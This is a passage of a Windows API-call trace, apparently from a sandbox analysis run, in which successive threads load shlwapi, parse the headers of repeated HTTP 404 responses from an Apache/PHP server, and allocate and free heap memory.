lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0267.463] GetProcessHeap () returned 0x840000 [0267.463] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 141 os_tid = 0x1228 [0267.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.999] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.999] GetProcessHeap () returned 0x840000 [0267.999] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0267.999] GetProcessHeap () returned 0x840000 [0268.000] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0268.000] GetProcessHeap () returned 0x840000 [0268.000] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 142 os_tid = 0x1238 [0268.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0268.696] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.696] GetProcessHeap () returned 0x840000 [0268.696] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0268.696] GetProcessHeap () returned 0x840000 [0268.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0268.696] GetProcessHeap () returned 0x840000 [0268.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 143 os_tid = 0x1210 [0269.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.321] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.321] GetProcessHeap () returned 0x840000 [0269.321] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0269.321] GetProcessHeap () returned 0x840000 [0269.321] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0269.321] GetProcessHeap () returned 0x840000 [0269.321] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 144 os_tid = 0x11dc [0269.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.847] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.847] GetProcessHeap () returned 0x840000 [0269.847] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0269.847] GetProcessHeap () returned 0x840000 [0269.847] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0269.847] GetProcessHeap () returned 0x840000 [0269.847] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 145 os_tid = 0x11c8 [0270.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.449] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:49 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.449] GetProcessHeap () returned 0x840000 [0270.450] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0270.450] GetProcessHeap () returned 0x840000 [0270.450] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0270.450] GetProcessHeap () returned 0x840000 [0270.450] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 146 os_tid = 0x1224 [0271.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.215] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.215] GetProcessHeap () returned 0x840000 [0271.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0271.215] GetProcessHeap () returned 0x840000 [0271.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0271.215] GetProcessHeap () returned 0x840000 [0271.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 147 os_tid = 0x11ec [0271.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.669] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.669] GetProcessHeap () returned 0x840000 [0271.669] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0271.669] GetProcessHeap () returned 0x840000 [0271.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0271.669] GetProcessHeap () returned 0x840000 [0271.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 148 os_tid = 0x8a0 [0272.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.232] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.232] GetProcessHeap () returned 0x840000 [0272.232] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0272.232] GetProcessHeap () returned 0x840000 [0272.232] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0272.232] GetProcessHeap () returned 0x840000 [0272.232] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 149 os_tid = 0x14c [0272.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.730] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.730] GetProcessHeap () returned 0x840000 [0272.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0272.731] GetProcessHeap () returned 0x840000 [0272.731] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0272.731] GetProcessHeap () returned 0x840000 [0272.731] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 150 os_tid = 0x1180 [0273.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.271] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.271] GetProcessHeap () returned 0x840000 [0273.271] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0273.271] GetProcessHeap () returned 0x840000 [0273.272] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0273.272] GetProcessHeap () returned 0x840000 [0273.272] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 151 os_tid = 0x4cc [0273.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0273.793] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.793] GetProcessHeap () returned 0x840000 [0273.793] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0273.793] GetProcessHeap () returned 0x840000 [0273.793] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0273.794] GetProcessHeap () returned 0x840000 [0273.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 152 os_tid = 0x58c [0274.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.342] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.342] GetProcessHeap () returned 0x840000 [0274.342] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0274.342] GetProcessHeap () returned 0x840000 [0274.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0274.342] GetProcessHeap () returned 0x840000 [0274.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 153 os_tid = 0x558 [0274.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0274.906] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:54 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.906] GetProcessHeap () returned 0x840000 [0274.906] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0274.906] GetProcessHeap () returned 0x840000 [0274.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0274.906] GetProcessHeap () returned 0x840000 [0274.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 154 os_tid = 0x4d8 [0275.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0275.410] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:54 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.410] GetProcessHeap () returned 0x840000 [0275.410] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0275.410] GetProcessHeap () returned 0x840000 [0275.410] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0275.410] GetProcessHeap () returned 0x840000 [0275.410] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 155 os_tid = 0x640 [0276.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.220] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.220] GetProcessHeap () returned 0x840000 [0276.221] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0276.221] GetProcessHeap () returned 0x840000 [0276.221] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0276.221] GetProcessHeap () returned 0x840000 [0276.221] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 156 os_tid = 0xda4 [0276.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.745] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.745] GetProcessHeap () returned 0x840000 [0276.745] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0276.745] GetProcessHeap () returned 0x840000 [0276.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0276.745] GetProcessHeap () returned 0x840000 [0276.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 157 os_tid = 0x68c [0277.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.254] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.255] GetProcessHeap () returned 0x840000 [0277.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0277.255] GetProcessHeap () returned 0x840000 [0277.255] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0277.255] GetProcessHeap () returned 0x840000 [0277.255] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 158 os_tid = 0x7ac [0277.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.794] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.794] GetProcessHeap () returned 0x840000 [0277.794] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0277.794] GetProcessHeap () returned 0x840000 [0277.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0277.794] GetProcessHeap () returned 0x840000 [0277.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 159 os_tid = 0x84c [0278.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.359] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:57 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.359] GetProcessHeap () returned 0x840000 [0278.359] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0278.359] GetProcessHeap () returned 0x840000 [0278.359] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0278.359] GetProcessHeap () returned 0x840000 [0278.359] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 160 os_tid = 0x80c [0278.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.865] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.865] GetProcessHeap () returned 0x840000 [0278.865] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0278.865] GetProcessHeap () returned 0x840000 [0278.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0278.865] GetProcessHeap () returned 0x840000 [0278.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 161 os_tid = 0x810 [0279.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.437] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.437] GetProcessHeap () returned 0x840000 [0279.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0279.437] GetProcessHeap () returned 0x840000 [0279.437] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0279.437] GetProcessHeap () returned 0x840000 [0279.437] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 162 os_tid = 0x9f4 [0279.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0279.998] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:59 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.998] GetProcessHeap () returned 0x840000 [0279.998] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0279.999] GetProcessHeap () returned 0x840000 [0279.999] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0279.999] GetProcessHeap () returned 0x840000 [0279.999] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 163 os_tid = 0x9a4 [0280.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0280.502] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:59 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.502] GetProcessHeap () returned 0x840000 [0280.502] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0280.502] GetProcessHeap () returned 0x840000 [0280.502] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0280.502] GetProcessHeap () returned 0x840000 [0280.503] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 164 os_tid = 0x5f8 [0281.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.034] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.035] GetProcessHeap () returned 0x840000 [0281.035] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0281.035] GetProcessHeap () returned 0x840000 [0281.035] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0281.035] GetProcessHeap () returned 0x840000 [0281.035] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 165 os_tid = 0x870 [0281.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0281.552] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.552] GetProcessHeap () returned 0x840000 [0281.552] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0281.552] GetProcessHeap () returned 0x840000 [0281.552] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0281.552] GetProcessHeap () returned 0x840000 [0281.552] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 166 os_tid = 0x918 [0282.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.118] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.118] GetProcessHeap () returned 0x840000 [0282.118] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0282.118] GetProcessHeap () returned 0x840000 [0282.118] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0282.118] GetProcessHeap () returned 0x840000 [0282.118] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 167 os_tid = 0x3f8 [0282.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.633] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.633] GetProcessHeap () returned 0x840000 [0282.633] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0282.633] GetProcessHeap () returned 0x840000 [0282.633] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0282.633] GetProcessHeap () returned 0x840000 [0282.633] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 168 os_tid = 0x848 [0283.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.129] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.129] GetProcessHeap () returned 0x840000 [0283.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0283.129] GetProcessHeap () returned 0x840000 [0283.129] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0283.130] GetProcessHeap () returned 0x840000 [0283.130] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 169 os_tid = 0x154 [0283.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.617] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.617] GetProcessHeap () returned 0x840000 [0283.617] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0283.617] GetProcessHeap () returned 0x840000 [0283.618] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 